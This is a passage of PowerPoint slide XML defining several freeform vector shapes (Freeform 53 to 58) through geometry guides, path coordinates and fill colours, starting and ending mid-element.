                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10646" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1261" y="2825"/>
                <a:ext cx="61" cy="112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 61"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 61"/>
                  <a:gd name="T3" fmla="*/ 109 h 112"/>
                  <a:gd name="T4" fmla="*/ 19 w 61"/>
                  <a:gd name="T5" fmla="*/ 112 h 112"/>
                  <a:gd name="T6" fmla="*/ 18 w 61"/>
                  <a:gd name="T7" fmla="*/ 98 h 112"/>
                  <a:gd name="T8" fmla="*/ 61 w 61"/>
                  <a:gd name="T9" fmla="*/ 104 h 112"/>
                  <a:gd name="T10" fmla="*/ 61 w 61"/>
                  <a:gd name="T11" fmla="*/ 98 h 112"/>
                  <a:gd name="T12" fmla="*/ 30 w 61"/>
                  <a:gd name="T13" fmla="*/ 95 h 112"/>
                  <a:gd name="T14" fmla="*/ 29 w 61"/>
                  <a:gd name="T15" fmla="*/ 82 h 112"/>
                  <a:gd name="T16" fmla="*/ 9 w 61"/>
                  <a:gd name="T17" fmla="*/ 82 h 112"/>
                  <a:gd name="T18" fmla="*/ 8 w 61"/>
                  <a:gd name="T19" fmla="*/ 81 h 112"/>
                  <a:gd name="T20" fmla="*/ 7 w 61"/>
                  <a:gd name="T21" fmla="*/ 76 h 112"/>
                  <a:gd name="T22" fmla="*/ 6 w 61"/>
                  <a:gd name="T23" fmla="*/ 69 h 112"/>
                  <a:gd name="T24" fmla="*/ 4 w 61"/>
                  <a:gd name="T25" fmla="*/ 58 h 112"/>
                  <a:gd name="T26" fmla="*/ 2 w 61"/>
                  <a:gd name="T27" fmla="*/ 47 h 112"/>
                  <a:gd name="T28" fmla="*/ 1 w 61"/>
                  <a:gd name="T29" fmla="*/ 34 h 112"/>
                  <a:gd name="T30" fmla="*/ 2 w 61"/>
                  <a:gd name="T31" fmla="*/ 19 h 112"/>
                  <a:gd name="T32" fmla="*/ 6 w 61"/>
                  <a:gd name="T33" fmla="*/ 3 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 61"/>
                  <a:gd name="T35" fmla="*/ 0 h 1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1"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 61 w 61"/>
                  <a:gd name="T57" fmla="*/ 112 h 1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1" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10647" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1291" y="2799"/>
                <a:ext cx="79" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 79"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 0 w 79"/>
                  <a:gd name="T3" fmla="*/ 15 h 15"/>
                  <a:gd name="T4" fmla="*/ 3 w 79"/>
                  <a:gd name="T5" fmla="*/ 14 h 15"/>
                  <a:gd name="T6" fmla="*/ 4 w 79"/>
                  <a:gd name="T7" fmla="*/ 14 h 15"/>
                  <a:gd name="T8" fmla="*/ 7 w 79"/>
                  <a:gd name="T9" fmla="*/ 13 h 15"/>
                  <a:gd name="T10" fmla="*/ 11 w 79"/>
                  <a:gd name="T11" fmla="*/ 12 h 15"/>
                  <a:gd name="T12" fmla="*/ 14 w 79"/>
                  <a:gd name="T13" fmla="*/ 11 h 15"/>
                  <a:gd name="T14" fmla="*/ 19 w 79"/>
                  <a:gd name="T15" fmla="*/ 10 h 15"/>
                  <a:gd name="T16" fmla="*/ 24 w 79"/>
                  <a:gd name="T17" fmla="*/ 8 h 15"/>
                  <a:gd name="T18" fmla="*/ 30 w 79"/>
                  <a:gd name="T19" fmla="*/ 8 h 15"/>
                  <a:gd name="T20" fmla="*/ 35 w 79"/>
                  <a:gd name="T21" fmla="*/ 7 h 15"/>
                  <a:gd name="T22" fmla="*/ 42 w 79"/>
                  <a:gd name="T23" fmla="*/ 7 h 15"/>
                  <a:gd name="T24" fmla="*/ 48 w 79"/>
                  <a:gd name="T25" fmla="*/ 6 h 15"/>
                  <a:gd name="T26" fmla="*/ 55 w 79"/>
                  <a:gd name="T27" fmla="*/ 7 h 15"/>
                  <a:gd name="T28" fmla="*/ 62 w 79"/>
                  <a:gd name="T29" fmla="*/ 7 h 15"/>
                  <a:gd name="T30" fmla="*/ 69 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 15"/>
                  <a:gd name="T32" fmla="*/ 76 w 79"/>
                  <a:gd name="T33" fmla="*/ 10 h 15"/>
                  <a:gd name="T34" fmla="*/ 79 w 79"/>
                  <a:gd name="T35" fmla="*/ 0 h 15"/>
                  <a:gd name="T36" fmla="*/ 79 w 79"/>
                  <a:gd name="T37" fmla="*/ 0 h 15"/>
                  <a:gd name="T38" fmla="*/ 76 w 79"/>
                  <a:gd name="T39" fmla="*/ 0 h 15"/>
                  <a:gd name="T40" fmla="*/ 74 w 79"/>
                  <a:gd name="T41" fmla="*/ 0 h 15"/>
                  <a:gd name="T42" fmla="*/ 70 w 79"/>
                  <a:gd name="T43" fmla="*/ 0 h 15"/>
                  <a:gd name="T44" fmla="*/ 66 w 79"/>
                  <a:gd name="T45" fmla="*/ 0 h 15"/>
                  <a:gd name="T46" fmla="*/ 61 w 79"/>
                  <a:gd name="T47" fmla="*/ 0 h 15"/>
                  <a:gd name="T48" fmla="*/ 56 w 79"/>
                  <a:gd name="T49" fmla="*/ 0 h 15"/>
                  <a:gd name="T50" fmla="*/ 51 w 79"/>
                  <a:gd name="T51" fmla="*/ 1 h 15"/>
                  <a:gd name="T52" fmla="*/ 44 w 79"/>
                  <a:gd name="T53" fmla="*/ 1 h 15"/>
                  <a:gd name="T54" fmla="*/ 38 w 79"/>
                  <a:gd name="T55" fmla="*/ 1 h 15"/>
                  <a:gd name="T56" fmla="*/ 31 w 79"/>
                  <a:gd name="T57" fmla="*/ 3 h 15"/>
                  <a:gd name="T58" fmla="*/ 25 w 79"/>
                  <a:gd name="T59" fmla="*/ 4 h 15"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 5 h 15"/>
                  <a:gd name="T62" fmla="*/ 12 w 79"/>
                  <a:gd name="T63" fmla="*/ 6 h 15"/>
                  <a:gd name="T64" fmla="*/ 6 w 79"/>
                  <a:gd name="T65" fmla="*/ 7 h 15"/>
                  <a:gd name="T66" fmla="*/ 0 w 79"/>
                  <a:gd name="T67" fmla="*/ 8 h 15"/>
                  <a:gd name="T68" fmla="*/ 0 w 79"/>
                  <a:gd name="T69" fmla="*/ 15 h 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9"/>
                  <a:gd name="T106" fmla="*/ 0 h 15"/>
                  <a:gd name="T107" fmla="*/ 79 w 79"/>
                  <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                    <a:moveTo>
                      <a:pt x="0" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10648" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1246" y="2939"/>
                <a:ext cx="132" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 132"/>
                  <a:gd name="T1" fmla="*/ 44 h 45"/>
                  <a:gd name="T2" fmla="*/ 56 w 132"/>
                  <a:gd name="T3" fmla="*/ 44 h 45"/>
                  <a:gd name="T4" fmla="*/ 56 w 132"/>
                  <a:gd name="T5" fmla="*/ 42 h 45"/>
                  <a:gd name="T6" fmla="*/ 57 w 132"/>
                  <a:gd name="T7" fmla="*/ 42 h 45"/>
                  <a:gd name="T8" fmla="*/ 59 w 132"/>
                  <a:gd name="T9" fmla="*/ 41 h 45"/>
                  <a:gd name="T10" fmla="*/ 61 w 132"/>
                  <a:gd name="T11" fmla="*/ 41 h 45"/>
                  <a:gd name="T12" fmla="*/ 63 w 132"/>
                  <a:gd name="T13" fmla="*/ 40 h 45"/>
                  <a:gd name="T14" fmla="*/ 65 w 132"/>
                  <a:gd name="T15" fmla="*/ 39 h 45"/>
                  <a:gd name="T16" fmla="*/ 68 w 132"/>
                  <a:gd name="T17" fmla="*/ 38 h 45"/>
                  <a:gd name="T18" fmla="*/ 71 w 132"/>
                  <a:gd name="T19" fmla="*/ 37 h 45"/>
                  <a:gd name="T20" fmla="*/ 73 w 132"/>
                  <a:gd name="T21" fmla="*/ 34 h 45"/>
                  <a:gd name="T22" fmla="*/ 76 w 132"/>
                  <a:gd name="T23" fmla="*/ 33 h 45"/>
                  <a:gd name="T24" fmla="*/ 78 w 132"/>
                  <a:gd name="T25" fmla="*/ 32 h 45"/>
                  <a:gd name="T26" fmla="*/ 80 w 132"/>
                  <a:gd name="T27" fmla="*/ 30 h 45"/>
                  <a:gd name="T28" fmla="*/ 82 w 132"/>
                  <a:gd name="T29" fmla="*/ 28 h 45"/>
                  <a:gd name="T30" fmla="*/ 84 w 132"/>
                  <a:gd name="T31" fmla="*/ 26 h 45"/>
                  <a:gd name="T32" fmla="*/ 85 w 132"/>
                  <a:gd name="T33" fmla="*/ 24 h 45"/>
                  <a:gd name="T34" fmla="*/ 0 w 132"/>
                  <a:gd name="T35" fmla="*/ 3 h 45"/>
                  <a:gd name="T36" fmla="*/ 6 w 132"/>
                  <a:gd name="T37" fmla="*/ 0 h 45"/>
                  <a:gd name="T38" fmla="*/ 132 w 132"/>
                  <a:gd name="T39" fmla="*/ 32 h 45"/>
                  <a:gd name="T40" fmla="*/ 126 w 132"/>
                  <a:gd name="T41" fmla="*/ 34 h 45"/>
                  <a:gd name="T42" fmla="*/ 90 w 132"/>
                  <a:gd name="T43" fmla="*/ 25 h 45"/>
                  <a:gd name="T44" fmla="*/ 90 w 132"/>
                  <a:gd name="T45" fmla="*/ 25 h 45"/>
                  <a:gd name="T46" fmla="*/ 90 w 132"/>
                  <a:gd name="T47" fmla="*/ 26 h 45"/>
                  <a:gd name="T48" fmla="*/ 89 w 132"/>
                  <a:gd name="T49" fmla="*/ 26 h 45"/>
                  <a:gd name="T50" fmla="*/ 89 w 132"/>
                  <a:gd name="T51" fmla="*/ 27 h 45"/>
                  <a:gd name="T52" fmla="*/ 87 w 132"/>
                  <a:gd name="T53" fmla="*/ 28 h 45"/>
                  <a:gd name="T54" fmla="*/ 86 w 132"/>
                  <a:gd name="T55" fmla="*/ 30 h 45"/>
                  <a:gd name="T56" fmla="*/ 85 w 132"/>
                  <a:gd name="T57" fmla="*/ 31 h 45"/>
                  <a:gd name="T58" fmla="*/ 83 w 132"/>
                  <a:gd name="T59" fmla="*/ 32 h 45"/>
                  <a:gd name="T60" fmla="*/ 80 w 132"/>
                  <a:gd name="T61" fmla="*/ 33 h 45"/>
                  <a:gd name="T62" fmla="*/ 78 w 132"/>
                  <a:gd name="T63" fmla="*/ 35 h 45"/>
                  <a:gd name="T64" fmla="*/ 76 w 132"/>
                  <a:gd name="T65" fmla="*/ 37 h 45"/>
                  <a:gd name="T66" fmla="*/ 72 w 132"/>
                  <a:gd name="T67" fmla="*/ 38 h 45"/>
                  <a:gd name="T68" fmla="*/ 70 w 132"/>
                  <a:gd name="T69" fmla="*/ 40 h 45"/>
                  <a:gd name="T70" fmla="*/ 65 w 132"/>
                  <a:gd name="T71" fmla="*/ 41 h 45"/>
                  <a:gd name="T72" fmla="*/ 62 w 132"/>
                  <a:gd name="T73" fmla="*/ 44 h 45"/>
                  <a:gd name="T74" fmla="*/ 57 w 132"/>
                  <a:gd name="T75" fmla="*/ 45 h 45"/>
                  <a:gd name="T76" fmla="*/ 55 w 132"/>
                  <a:gd name="T77" fmla="*/ 44 h 4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45"/>
                  <a:gd name="T119" fmla="*/ 132 w 132"/>
                  <a:gd name="T120" fmla="*/ 45 h 4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45">
                    <a:moveTo>
                      <a:pt x="55" y="44"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="44"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10649" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1218" y="2951"/>
                <a:ext cx="135" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 135"/>
                  <a:gd name="T1" fmla="*/ 0 h 40"/>
                  <a:gd name="T2" fmla="*/ 132 w 135"/>
                  <a:gd name="T3" fmla="*/ 40 h 40"/>
                  <a:gd name="T4" fmla="*/ 135 w 135"/>
                  <a:gd name="T5" fmla="*/ 40 h 40"/>
                  <a:gd name="T6" fmla="*/ 5 w 135"/>
                  <a:gd name="T7" fmla="*/ 0 h 40"/>
                  <a:gd name="T8" fmla="*/ 0 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 40"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 135"/>
                  <a:gd name="T16" fmla="*/ 0 h 40"/>
                  <a:gd name="T17" fmla="*/ 135 w 135"/>
                  <a:gd name="T18" fmla="*/ 40 h 40"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="135" h="40">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10650" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1241" y="2946"/>
                <a:ext cx="132" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 132"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 130 w 132"/>
                  <a:gd name="T3" fmla="*/ 35 h 35"/>
                  <a:gd name="T4" fmla="*/ 132 w 132"/>
                  <a:gd name="T5" fmla="*/ 35 h 35"/>
                  <a:gd name="T6" fmla="*/ 4 w 132"/>
                  <a:gd name="T7" fmla="*/ 0 h 35"/>
                  <a:gd name="T8" fmla="*/ 0 w 132"/>
                  <a:gd name="T9" fmla="*/ 0 h 35"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 132"/>
                  <a:gd name="T16" fmla="*/ 0 h 35"/>
                  <a:gd name="T17" fmla="*/ 132 w 132"/>
                  <a:gd name="T18" fmla="*/ 35 h 35"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="132" h="35">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10651" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2948"/>
                <a:ext cx="133" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 0 h 38"/>
                  <a:gd name="T2" fmla="*/ 130 w 133"/>
                  <a:gd name="T3" fmla="*/ 38 h 38"/>
                  <a:gd name="T4" fmla="*/ 133 w 133"/>
                  <a:gd name="T5" fmla="*/ 38 h 38"/>
                  <a:gd name="T6" fmla="*/ 3 w 133"/>
                  <a:gd name="T7" fmla="*/ 0 h 38"/>
                  <a:gd name="T8" fmla="*/ 0 w 133"/>
                  <a:gd name="T9" fmla="*/ 0 h 38"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 133"/>
                  <a:gd name="T16" fmla="*/ 0 h 38"/>
                  <a:gd name="T17" fmla="*/ 133 w 133"/>
                  <a:gd name="T18" fmla="*/ 38 h 38"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
